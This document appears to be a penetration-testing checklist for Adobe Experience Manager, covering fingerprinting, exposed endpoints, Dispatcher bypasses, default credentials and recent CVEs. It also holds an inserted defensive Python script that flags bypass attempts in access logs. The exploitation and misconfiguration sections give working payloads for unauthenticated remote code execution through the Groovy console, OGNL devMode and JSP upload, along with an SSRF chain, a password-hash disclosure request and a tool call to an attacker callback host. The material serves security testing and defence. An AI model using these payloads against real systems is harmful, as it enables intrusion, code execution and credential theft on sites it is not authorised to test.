AEM (Adobe Experience Manager) Pentesting


Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).
From an attacker's perspective, AEM instances frequently expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched quarterly.

The checklist below focuses on the externally reachable (unauthenticated) attack surface, i.e. the issues that keep showing up in real engagements (2022-2026).


1. Fingerprinting

$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1            # header added by AEM Dispatcher
X-Vary: Accept-Encoding

Other quick indicators:

  • The static path /etc.clientlibs/ exists (returns JS/CSS).
  • The login page /libs/granite/core/content/login.html with the "Adobe Experience Manager" banner.
  • The comment </script><!--/* CQ */--> at the bottom of the HTML.

2. High-value unauthenticated endpoints

Path (what you get) – notes:

  • /.json, /.1.json (JCR nodes via DefaultGetServlet) – usually blocked, but the Dispatcher bypass (see below) works.
  • /bin/querybuilder.json?path=/ (QueryBuilder API) – leaks the page tree, internal paths and usernames.
  • /system/console/status-*, /system/console/bundles (OSGi/Felix console) – returns 403 by default; if exposed and creds are found ⇒ bundle-upload RCE.
  • /crx/packmgr/index.jsp (Package Manager) – allows authenticated content package → JSP payload upload.
  • /etc/groovyconsole/** (AEM Groovy Console) – if exposed → arbitrary Groovy / Java execution.
  • /libs/cq/AuditlogSearchServlet.json (audit logs) – information disclosure.
  • /libs/cq/ui/content/dumplibs.html (ClientLibs dump) – XSS vector.
  • /adminui/debug (AEM Forms on JEE Struts dev-mode OGNL evaluator) – on misconfigured Forms installs (CVE-2025-54253) this endpoint executes unauthenticated OGNL → RCE.

Dispatcher bypass tricks (still working in 2025/2026)

Most production sites sit behind the Dispatcher (a reverse proxy). Its filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.

Classic semicolon + allowed extension

GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1

Encoded slash bypass (2025 KB ka-27832)

GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1

If the Dispatcher allows encoded slashes, this returns JSON even when /bin is supposedly denied.
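As an added defensive example (not part of the original page), the following Python normalizes request targets the way Sling effectively resolves them and flags access-log entries in which a denied path was reached through the semicolon or encoded-slash tricks above. The log lines, the denied-path list and the function names are constructed assumptions for the example.

```python
import re
from urllib.parse import unquote

# Paths the Dispatcher is expected to deny to anonymous clients (endpoint table above)
DENIED_PREFIXES = ("/bin/", "/system/console", "/crx/", "/etc/groovyconsole",
                   "/etc/truststore", "/adminui/debug", "/libs/cq/AuditlogSearchServlet")

# Combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def canonical_path(target):
    """Reduce a raw request target to the path Sling will actually resolve."""
    path = target.split("?", 1)[0]
    prev = None
    while prev != path:               # peel double encoding (%252f -> %2f -> /)
        prev, path = path, unquote(path)
    path = path.split(";", 1)[0]      # Sling ignores a ';%0aa.css' style suffix
    path = re.sub(r"/+", "/", path)   # '//bin' from a decoded %2f collapses to '/bin'
    return path if path.startswith("/") else "/" + path

def classify(target):
    """None = not a denied path, 'direct' = plain hit, 'evasive' = bypass attempt."""
    canon = canonical_path(target)
    if not canon.startswith(DENIED_PREFIXES):
        return None
    raw = target.split("?", 1)[0]
    if "%2f" in raw.lower() or "%3b" in raw.lower() or ";" in raw or canon != raw:
        return "evasive"
    return "direct"

def find_bypasses(log_text):
    """Return the evasive requests found in a block of access-log lines."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and classify(m["target"]) == "evasive":
            hits.append({"ip": m["ip"], "target": m["target"], "status": m["status"],
                         "canonical": canonical_path(m["target"])})
    return hits

# Constructed sample log (not real traffic): normal page, blocked direct hit,
# two bypasses the filter let through (200), and a legitimate clientlib request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2026:10:00:01 +0000] "GET /content/site/en.html HTTP/1.1" 200 5123
203.0.113.7 - - [10/Jan/2026:10:00:02 +0000] "GET /bin/querybuilder.json?path=/ HTTP/1.1" 403 0
203.0.113.7 - - [10/Jan/2026:10:00:03 +0000] "GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1" 200 8812
203.0.113.7 - - [10/Jan/2026:10:00:04 +0000] "GET /%2fbin%2fquerybuilder.json?path=/etc HTTP/1.1" 200 1201
198.51.100.9 - - [10/Jan/2026:10:00:05 +0000] "GET /etc.clientlibs/site/main.css HTTP/1.1" 200 300
"""
```

A 200 on a flagged entry means the Dispatcher filter let the request through, which is the case to alert on; the same normalization can be reused to test a candidate filter rule set offline.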


3. Common misconfigurations (still alive in 2026)

  1. Anonymous POST servlet – POST /.json with :operation=import lets you plant new JCR nodes. Blocking *.json POST in the Dispatcher fixes it.
  2. World-readable user profiles – default ACL grants jcr:read on /home/users/**/profile/* to everyone.
  3. Default credentials – admin:admin, author:author, replication:replication.
  4. WCMDebugFilter enabled ⇒ reflected XSS via ?debug=layout (CVE-2016-7882, still found on legacy 6.4 installs).
  5. Groovy Console exposed – remote code execution by sending a Groovy script:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
  6. Dispatcher encoded-slash gap – /bin/querybuilder.json and /etc/truststore.json reachable with %2f/%3B even when blocked by path filters.
  7. AEM Forms Struts devMode left enabled – /adminui/debug?expression= evaluates OGNL without auth (CVE-2025-54253) leading to unauth RCE; paired XXE in Forms submission (CVE-2025-54254) allows file read.

4. Recent vulnerabilities (service-pack cadence)

Quarter – CVE / bulletin (affected versions): impact

  • Dec 2025 – APSB25-115, CVE-2025-64537/64539 (6.5.24 & earlier, Cloud 2025.12): multiple critical/stored XSS → code execution via the author UI.
  • Sep 2025 – APSB25-90 (6.5.23 & earlier): security feature bypass chain (Dispatcher auth checker); upgrade to 6.5.24/Cloud 2025.12.
  • Aug 2025 – CVE-2025-54253 / 54254 (AEM Forms JEE, Forms 6.5.23.0 and earlier): DevMode OGNL RCE + XXE file read, unauthenticated.
  • Jun 2025 – APSB25-48 (6.5.23 & earlier): stored XSS and privilege escalation in Communities components.
  • Dec 2024 – APSB24-69, rev. Mar 2025 adds CVE-2024-53962…74 (6.5.22 & earlier): DOM/stored XSS, arbitrary code execution (low-priv).
  • Dec 2023 – APSB23-72 (≤ 6.5.18): DOM-based XSS via crafted URL.

Always check the APSB bulletin matching the customer’s service-pack and push for the latest 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE requires its own add-on hotfix 6.5.0-0108+.


5. Exploitation snippets

5.1 RCE via dispatcher bypass + JSP upload

If anonymous write is possible:

# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import

Now request /content/evil.jsp – the JSP runs with the privileges of the AEM process user.

5.2 SSRF to RCE (legacy versions < 6.3)

/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console

The aem_ssrf2rce.py script from aem-hacker automates the whole chain.

5.3 OGNL RCE in AEM Forms JEE (CVE-2025-54253)

# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"

If the instance is vulnerable, the HTTP response body contains the command output.

5.4 QueryBuilder hash disclosure (encoded slash bypass)

GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1

When the anonymous read ACLs are left at their defaults, this returns user nodes that include the rep:password hash.


6. Tools

  • aem-hacker – multi-purpose enumeration script supporting Dispatcher bypass, SSRF detection, default-creds checks and more.
python3 aem_hacker.py -u https://target --host attacker-ip
  • Tenable WAS plugin 115065 – automatically detects QueryBuilder hash disclosure & the encoded-slash bypass (released December 2025).
  • Content brute-force – recursively request /_jcr_content.(json|html) to discover hidden components.
  • osgi-infect – uploads a malicious OSGi bundle via /system/console/bundles (if creds are available).
